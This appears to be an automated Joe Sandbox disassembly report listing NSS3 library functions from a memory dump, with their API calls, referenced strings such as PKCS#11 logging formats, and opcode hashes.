PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C7D6BF7), ref: 6C7D6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C7D6BF7), ref: 6C7D6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C7D6BF7), ref: 6C7D6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C7D6BF7), ref: 6C7D6FFD

Strings

SSLKEYLOGFILE, xrefs: 6C7D6EB1
SSLFORCELOCKS, xrefs: 6C7D6F2B
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C7D6FDB
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C7D6EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C7D6FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C7D6F4F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 88056f85b4e88881a514d8cad52c09faf55416d400e6eb57681fd6119ccb3483
Instruction ID: 2f7186d64dfea0481343a6347ce8a9de77c6c059e3f15c82b700b766320ea4f4
Opcode Fuzzy Hash: 88056f85b4e88881a514d8cad52c09faf55416d400e6eb57681fd6119ccb3483
Instruction Fuzzy Hash: 97A11973A55DD086E720467CDE0134836A2AB9732EF594779E832C7ED9DB35B440C392

Function 6C76AEC0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76AF39
PR_Unlock.NSS3(?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76AF69
TlsGetValue.KERNEL32 ref: 6C76B06B
EnterCriticalSection.KERNEL32(?), ref: 6C76B083
PR_Unlock.NSS3(?), ref: 6C76B0A4
TlsGetValue.KERNEL32 ref: 6C76B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6C76B0D9
PR_Unlock.NSS3 ref: 6C76B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C76B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C76B182

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C76B177

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C74AB95,00000000,?,00000000,00000000,00000000), ref: 6C76B1C2

Part of subcall function 6C791560: TlsGetValue.KERNEL32(00000000,?,6C760844,?), ref: 6C79157A
Part of subcall function 6C791560: EnterCriticalSection.KERNEL32(?,?,?,6C760844,?), ref: 6C79158F
Part of subcall function 6C791560: PR_Unlock.NSS3(?,?,?,?,6C760844,?), ref: 6C7915B2

Strings

/G6/, xrefs: 6C76AECC

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID: /G6/
API String ID: 4188828017-570549270
Opcode ID: 63e7edd172ac3ac22d6b7c529859c3ee37bf0da77a33c151ce5d9fc71aa742b5
Instruction ID: 7351a2aa439bf1ddc4bc3a3c065f203987bb9df04cd35d185505f6371b5da83c
Opcode Fuzzy Hash: 63e7edd172ac3ac22d6b7c529859c3ee37bf0da77a33c151ce5d9fc71aa742b5
Instruction Fuzzy Hash: 44A1C1B1D00205ABEF019F65DE49AEE7BB4AF09308F144134EC05A7B52EB31E959CBE1

Function 6C762980 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C749E71,?,?,6C75F03D), ref: 6C7629A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C749E71,?), ref: 6C7629B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C749E71,?,?,6C75F03D), ref: 6C7629E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C749E71,?), ref: 6C7629F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C749E71,?), ref: 6C762A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C749E71), ref: 6C762A13

Part of subcall function 6C7EDD70: TlsGetValue.KERNEL32 ref: 6C7EDD8C
Part of subcall function 6C7EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7EDDB4

PR_Unlock.NSS3(?), ref: 6C762A6A
TlsGetValue.KERNEL32 ref: 6C762A98
EnterCriticalSection.KERNEL32(?), ref: 6C762AAC
PL_HashTableLookup.NSS3(?,?), ref: 6C762ABC
PR_Unlock.NSS3(?), ref: 6C762AC9
TlsGetValue.KERNEL32 ref: 6C762B3D
EnterCriticalSection.KERNEL32(?), ref: 6C762B51
PL_HashTableLookup.NSS3(?,6C749E71), ref: 6C762B61
PR_Unlock.NSS3(?), ref: 6C762B6E

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

/G6/, xrefs: 6C76298F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID: /G6/
API String ID: 2204204336-570549270
Opcode ID: e9052ec2f4cc8d942fd0eeb7a3fb06f4b58f5273e3ddbd50cfa55ef14f2d0aa8
Instruction ID: e428834ff22e0019e2988cf22f74d7f62e3b7954222edfa74393c9fb30972749
Opcode Fuzzy Hash: e9052ec2f4cc8d942fd0eeb7a3fb06f4b58f5273e3ddbd50cfa55ef14f2d0aa8
Instruction Fuzzy Hash: DE71E076900204ABDB509F29DD4C8AA7B78FF1535CB098534EC1C9BB12EB31E964CBD0

Function 6C748E00 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C748E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C748E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C748EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8718D0,?), ref: 6C748F03
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C748F19
PL_FreeArenaPool.NSS3(?), ref: 6C748F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C748F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C748F65
PL_FinishArenaPool.NSS3(?), ref: 6C748FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C748FFE
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C749012
PL_FreeArenaPool.NSS3(?), ref: 6C749024
PL_FinishArenaPool.NSS3(?), ref: 6C74902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C74903E

Strings

security, xrefs: 6C748EE7
/G6/, xrefs: 6C748E0F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: /G6/$security
API String ID: 3512696800-2919133760
Opcode ID: 6a65fc0a79f733baa75534499c086d55e707402eb20299c8d86049b54c492240
Instruction ID: 881aaa18e986aded5188aef3c710bb9fef37cd0a8f2fd1412e8523e0102a4be6
Opcode Fuzzy Hash: 6a65fc0a79f733baa75534499c086d55e707402eb20299c8d86049b54c492240
Instruction Fuzzy Hash: 20516B71608200ABE7209A999F44FAB37ACAB8575CF40893EF854D7B40E331D909C393

Function 6C774E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C774E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C774EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774EC7

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C774EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C774F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C774F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C774F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C774F68

Strings

pTemplate = 0x%p, xrefs: 6C774F4A
(CK_INVALID_HANDLE), xrefs: 6C774EC0, 6C774F13
hObject = 0x%x, xrefs: 6C774EF5, 6C774F05
/G6/, xrefs: 6C774E69
ulCount = %d, xrefs: 6C774F63
C_GetAttributeValue, xrefs: 6C774E7E
hSession = 0x%x, xrefs: 6C774EA2, 6C774EB2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$/G6/$C_GetAttributeValue
API String ID: 1003633598-3856902816
Opcode ID: c60da9c7c11c20db7d9a66ea1508814fe2d427e36903406736655a2aacd0da1c
Instruction ID: c5cf19397fa5c95ce75a9738f66b49da0280bc656f0b83c7fdcecb8e8b6c56e9
Opcode Fuzzy Hash: c60da9c7c11c20db7d9a66ea1508814fe2d427e36903406736655a2aacd0da1c
Instruction Fuzzy Hash: 9441C271601108ABDF308B95EF4CF9E37B5AB4231DF484835F90957B12D734A958EBA2

Function 6C774CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C774CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C774D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774D37

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C774D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C774D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C774D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C774DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C774DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C774E20

Strings

(CK_INVALID_HANDLE), xrefs: 6C774D30, 6C774D83
C_GetObjectSize, xrefs: 6C774CEE
hObject = 0x%x, xrefs: 6C774D65, 6C774D75
/G6/, xrefs: 6C774CD9
pulSize = 0x%p, xrefs: 6C774DB7
*pulSize = 0x%x, xrefs: 6C774E1B
hSession = 0x%x, xrefs: 6C774D12, 6C774D22

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_GetObjectSize
API String ID: 1003633598-55055668
Opcode ID: 8470f855000a6354cba51ece205f81f531558937ffdd6d295c14671bd72ff152
Instruction ID: 8e189e1632cf00dbbd0f8d917f69df1e87020e928253ba861de79a18511a56b4
Opcode Fuzzy Hash: 8470f855000a6354cba51ece205f81f531558937ffdd6d295c14671bd72ff152
Instruction Fuzzy Hash: 2341D672600108AFDF308B55EF8DB6E37B5AB4230DF444835F90967B12D734A858EBA2

Function 6C772F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C772F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C772F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C772F63

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C772F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C772F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C772FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C772FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C772FE7

Strings

pOldPin = 0x%p, xrefs: 6C772F95
C_SetPIN, xrefs: 6C772F21
(CK_INVALID_HANDLE), xrefs: 6C772F5C
ulNewLen = %d, xrefs: 6C772FE2
pNewPin = 0x%p, xrefs: 6C772FC9
/G6/, xrefs: 6C772F0C
ulOldLen = %d, xrefs: 6C772FB0
hSession = 0x%x, xrefs: 6C772F3E, 6C772F4E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$/G6/$C_SetPIN
API String ID: 1003633598-3233165297
Opcode ID: 938c18b480cd758d4c7cc07ee777c3ed9580410a03bcc18a3e9a0f3df74b44a7
Instruction ID: 340a189f6caf91ace1a38b8e15954fd82b9ff221861b3ff8fde6f87514720fa0
Opcode Fuzzy Hash: 938c18b480cd758d4c7cc07ee777c3ed9580410a03bcc18a3e9a0f3df74b44a7
Instruction Fuzzy Hash: 6031B475A01148EBCF309B95EF4CE5E37B2EB4631DF844434E81967B12DB34A858DBA1

Function 6C77A9A0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6C77A9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C77A9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C77AA03

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C77AA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C77AA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C77AA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6C77AA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6C77AA87

Strings

(CK_INVALID_HANDLE), xrefs: 6C77A9FC
ulParameterLen = 0x%p, xrefs: 6C77AA50
/G6/, xrefs: 6C77A9AC
pAssociatedData = 0x%p, xrefs: 6C77AA69
pParameter = 0x%p, xrefs: 6C77AA35
hSession = 0x%x, xrefs: 6C77A9DE, 6C77A9EE
C_DecryptMessageBegin, xrefs: 6C77A9C1
ulAssociatedDataLen = 0x%p, xrefs: 6C77AA82

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_DecryptMessageBegin
API String ID: 1003633598-2052406024
Opcode ID: 814756ad6cb02c60d5c122e0aeb2363c423ec52a58fb8731d8a750b0cdce3fa0
Instruction ID: 4f99859e26597ffbeec70ec0a8a608e1493298c66de0c2107304812c279f4be1
Opcode Fuzzy Hash: 814756ad6cb02c60d5c122e0aeb2363c423ec52a58fb8731d8a750b0cdce3fa0
Instruction Fuzzy Hash: 0C31C276601149ABDF309B95EF4CA9E37B1BB4232CF455434E80967B12D730E858DBA1

Function 6C78EDD0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C78EE0B

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EEE1

Part of subcall function 6C781D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C781D7E
Part of subcall function 6C781D50: EnterCriticalSection.KERNEL32(?), ref: 6C781D8E
Part of subcall function 6C781D50: PR_Unlock.NSS3(?), ref: 6C781DD3

TlsGetValue.KERNEL32 ref: 6C78EE51
EnterCriticalSection.KERNEL32(?), ref: 6C78EE65
PR_Unlock.NSS3(?), ref: 6C78EEA2
free.MOZGLUE(?), ref: 6C78EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C78EED0
PR_Unlock.NSS3(?), ref: 6C78EF48
free.MOZGLUE(?), ref: 6C78EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C78EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C78EFA4
free.MOZGLUE(?), ref: 6C78EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C78F055
free.MOZGLUE(?), ref: 6C78F060

Strings

/G6/, xrefs: 6C78EDE4

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID: /G6/
API String ID: 2524771861-570549270
Opcode ID: 41567dbc1818e8c59f7325bcb9358c2a3805a523851a23d64724366911d1f2f1
Instruction ID: aca754448de51e12d15a3510860fa444a4cd7aa4aee813ed90398d703c83c8d3
Opcode Fuzzy Hash: 41567dbc1818e8c59f7325bcb9358c2a3805a523851a23d64724366911d1f2f1
Instruction Fuzzy Hash: 828182B5A01209ABEF00DFA5DD49ADE7BB9BF08318F544034EA19A7711E731E914CBE1

Function 6C754CF0 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C754D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C754D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C754DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C754E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C754E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C754E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C754E85
DER_Encode_Util.NSS3(?,?,6C8A05A4,00000000), ref: 6C754EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C754F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C754F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C754F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C754F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C754F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C754FC8

Strings

/G6/, xrefs: 6C754D05

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID: /G6/
API String ID: 2843999940-570549270
Opcode ID: 7a0e7e32b082f2fa9173175d73da29790a18ea40434b730e7c757a6c1c4ca9a5
Instruction ID: 7d96817ad68b75f95792acff7e0f6fa5eeaa3b86200175d709f4d66054154ed6
Opcode Fuzzy Hash: 7a0e7e32b082f2fa9173175d73da29790a18ea40434b730e7c757a6c1c4ca9a5
Instruction Fuzzy Hash: 3481C671A043019FE711CF28DE44B5BB7E8AB85308F54892DF959DB680EB31E925CB92

